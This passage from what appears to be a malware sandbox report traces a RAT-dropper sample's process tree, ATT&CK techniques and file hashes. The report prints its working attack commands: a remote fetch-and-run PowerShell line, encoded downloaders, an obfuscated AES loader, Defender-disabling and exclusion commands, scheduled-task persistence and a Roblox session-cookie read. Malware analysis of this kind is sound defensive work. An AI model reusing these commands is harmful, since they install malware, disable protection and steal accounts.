ZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:4288
        
        C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe"
        10⤵
        Executes dropped EXE
        
        PID:1824
        
        C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe"
        11⤵
        Executes dropped EXE
        
        PID:2944
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "wzcnetwork" /tr "%Current%\wzcnetwork.exe"
        12⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4324
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        13⤵
        
        PID:3380
        
        C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe"
        11⤵
        Executes dropped EXE
        
        PID:5628
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit
        7⤵
        
        PID:2940
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1448
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9442.tmp.bat""
        7⤵
        
        PID:5012
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1904
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        8⤵
        Delays execution with timeout.exe
        
        PID:3300
      - C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        6⤵
        Executes dropped EXE
        
        PID:3876
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
      4⤵
      PID:3340
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4060
    - - C:\Windows\system32\net.exe
        
        net file
        5⤵
        
        PID:2892
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        6⤵
        
        PID:1660
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3640
  - - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
      "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
      4⤵
      Executes dropped EXE
      PID:4892
    - - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        5⤵
        Executes dropped EXE
        
        PID:1832
    - - C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4600
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"
        6⤵
        
        PID:4204
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm rentry.co/microsoft-vir/raw | iex"
        7⤵
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3752
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAG8AaQBjAHEAUgBYAEcAaABjAGUAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAGUAcQA0ADQALwBkAC8AcgBhAHcALwBtAGEAaQBuAC8AdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AZQBxADQANAAvAGQALwByAGEAdwAvAG0AYQBpAG4ALwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5808
        
        C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe"
        9⤵
        Executes dropped EXE
        
        PID:3196
        
        C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe"
        10⤵
        Executes dropped EXE
        
        PID:5760
        
        C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe"
        10⤵
        Executes dropped EXE
        
        PID:5404
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2292
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2924
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp8975.tmp.bat""
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4288
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4892
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:3436
        
        C:\Users\Admin\AppData\Roaming\wzcdetect.exe
        
        "C:\Users\Admin\AppData\Roaming\wzcdetect.exe"
        7⤵
        Executes dropped EXE
        
        PID:1408
    - - C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4276
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        6⤵
        
        PID:4588
      - C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        6⤵
        Views/modifies file attributes
        
        PID:1448
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1520
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1928
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4816
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4088
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        6⤵
        
        PID:2780
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        6⤵
        
        PID:3916
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        6⤵
        
        PID:3940
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2924
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4004
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:2492
      - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5760
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:468
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3512

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3428

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3812

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3888

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:3956

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3968

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4260

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:1044

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:916

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:1956

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Modifies data under HKEY_USERS
PID:3536

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3252

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2296

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:1088

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4588

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2512

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3296

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:3516

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Enumerates system info in registry
PID:2448

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:6416
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 476 -p 4348 -ip 4348
  2⤵
  PID:844
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 412 -p 5152 -ip 5152
  2⤵
  PID:3104
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 512 -p 5172 -ip 5172
  2⤵
  PID:6308
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 568 -p 3168 -ip 3168
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:2840
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 604 -p 2936 -ip 2936
  2⤵
  PID:3100
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 576 -p 6000 -ip 6000
  2⤵
  PID:5600
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 576 -p 2696 -ip 2696
  2⤵
  PID:6168

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
b5ad5caaaee00cb8cf445427975ae66c

SHA1
dcde6527290a326e048f9c3a85280d3fa71e1e22

SHA256
b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8

SHA512
92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
1008B

MD5
d222b77a61527f2c177b0869e7babc24

SHA1
3f23acb984307a4aeba41ebbb70439c97ad1f268

SHA256
80dc3ffa698e4ff2e916f97983b5eae79470203e91cb684c5ccd4ff1a465d747

SHA512
d17d836ea77aeaff4cd01f9c7523345167a4a6bc62528aac74acde12679f48079d75d159e9cea2e614da50e83c2dcd92c374c899ea6c4fe8e5513d9bf06c01ff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
775581a3c4116bd7bee8669a83910ad4

SHA1
24467bd2c66a0e1d91a322e2ee5fe4fad3ec38a0

SHA256
f4aade2a8d1f0c2b4ce763b1874e55fc1516357883b7523cc5ed36f7633715b9

SHA512
a2fe1ec2d466e2eebb08ae9d2eb31c395ad84a07399cfa96e6dca27e286a960b12646d25546889968b115587722775779ba8e02c60a2962127c9b52f7263e9c9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
6f86aa91af77ca4cacdf0567af516b18

SHA1
4a511b5ffe49f6e6c318859dbdc1be4141212bff

SHA256
b96c5cea3dd0e55e079f0564a35cfd5712bcc024e98e1b985572dfcec454980e

SHA512
d136b1f0ddeef5891b070e014749bedc630bb08b70a58bca468c6c19ee2e0329c450be82014446b960ed8ed54a5a833115bf9ab63b8734faae8c54a2195b059b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
6bff197b24d3c0b2e5cfe89c0eb2e9ae

SHA1
7a6fac24b642fdffc8cb7d273d9230318e0af996

SHA256
7a73282c75de9cdf62b2cc29c7af7524dda5702a70c69b296e2c1c7734bd564b

SHA512
e6f84003ef2fb7c9722d87c88ca723c9259f3d30d59bba40d5957f55b9f32242cc211d7c5e7bd8f7d58ea580d64c914c2b22845f907d9c3e6f4303ec9c25b139

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\a4db20d6-44bc-402d-9106-c814f51401f0.tmp

Filesize
691B

MD5
2521497f15f81d2cc1f2526bc3cdffde

SHA1
1c36a310598928608ad40e2ebfac8bcacd1d9f3e

SHA256
b4281bbf7f3c28795c9dc0d9eb4e1e55f38c94cc5288b6c35f0ab378229fb4df

SHA512
e6d4b5dc5100762ee607039aa8e1b2107ed3473ca84d13165a7ca395a40bdc176522fce4e5fe78f4b16b1048a0936f19c1a6c27c1b8c077f46417cbf42401bff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\bbf6d49e-03ce-4eb0-b55d-62123d66d403.tmp

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
ad21fe09b41d8b4287b6ef6db27944ee

SHA1
bca50e140867552f3ad1ad499e5e1a222614807c

SHA256
08fbe975e4db10fb6fe61bb6a59d07651d8bf7c4eeb3371f84e3341636b330ca

SHA512
0a0e95f39e4f2e480f7d98e496c4b08f129fd6a45d21edb883560892791e309d52dc6e94ea5d4b757d1fdd318019207a95551bda5673f2cc856031e5b6399122

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
ec9342132a869d6bf83e3c428ed749b0

SHA1
c45a2322661d08ee44f12df0f922a7fff22cdb18

SHA256
0d7f32e7b5536271ed198b94f8933de9f938d72a5f8ad9fb2ee591ef7df59bf3

SHA512
2e99f675004f26c3745eb9290a1b7c14159986dac0722655e7ca67ae0aca4c5b1ca241150cd62f39b6755824c688a9d9a1df9274ee881c1004881e1aaf31a1ef

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
11c4415265b79cce718f28331f3aa306

SHA1
bc2abcd85387016c2fb9f63f46d9afad73b286c1

SHA256
5df997adf653149fd906ba254a4e74027ee0f433cc31fd80ef3132530fd04d6e

SHA512
d5f6827f50465c3d7dc27bf47d095fc155ead1c3f575075d7b4e077f245773648f74932facdbc9d210ecaef2319c1595c1e04240a3cc23df896376103274a564

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
9c438ca2b12c221e55082c63921e37e4

SHA1
0a3752cf1101bc6a217fb0686fcbe215e9819c42

SHA256
6c82ac9d10b160f10ac984790adf644bb0405b883012301e76583e9a390fb48a

SHA512
ba15e00c5b9f3f604e305f40a96efc124c7d9b9640476826ee3f608f5ec6375617f3db996f8cb3551bce1379376858c58fae7f8b6008137f6469718249bc3856

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
849c12e22a809cac3e76dd0273e9cccf

SHA1
5f4dd48c628cfdc0f7a5045539881a42f98939c2

SHA256
1d171b5261cda55512dd2b8c65a6d3dc4460173710214a81016bdb0af5914db8

SHA512
83cefaffa46b3bdc918b73b982694509f509deaabf2f8f5cbec87dd92124c3b414dcadc2762f87dda508cf1e66f83bcfb1b750a1f7076939168085dfec8889e0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
4b41bf3220a7f4fada30020fac8f7c1c

SHA1
c16e9951d602689b4e14731805d0bfb1b1288ce8

SHA256
835703e04388a7ca8ede4240b102fdd16e88a9e75eb8b712e0961774b6e6254b

SHA512
6816b85d34fbee6ae8d5761349eb414ca3955550e0a63edb025410089a2e8d4792dfb8dcee49c0824a2dce7d9e55662e6958347a2d7d95afa42b7b4ae4d35abd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
acc0f2936f04f6e65df511af78803b10

SHA1
4ffec3c8b2fe2d402cafff6171ed52025b408c61

SHA256
fd0074403ddc785f5fad930518b052f3365f4bb9d0a577b00905315b9d9fb697

SHA512
ec3e4fb54549151cac6e0c043a467d96f5b056b1a54ec40d33babecb5e47a6550cfae60def1ddd2e18639df95102152d41012e270a4723db1e2bd614b9bbca35

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
9fdd6debee6c905cb4f2b5cdeef4de15

SHA1
98028ee769ae0109395ab86655f1fef165e099f4

SHA256
3f97912398a9dda0f7af2a781a2652723cb85b6da1567cbfb16f1f8a616ca9f8

SHA512
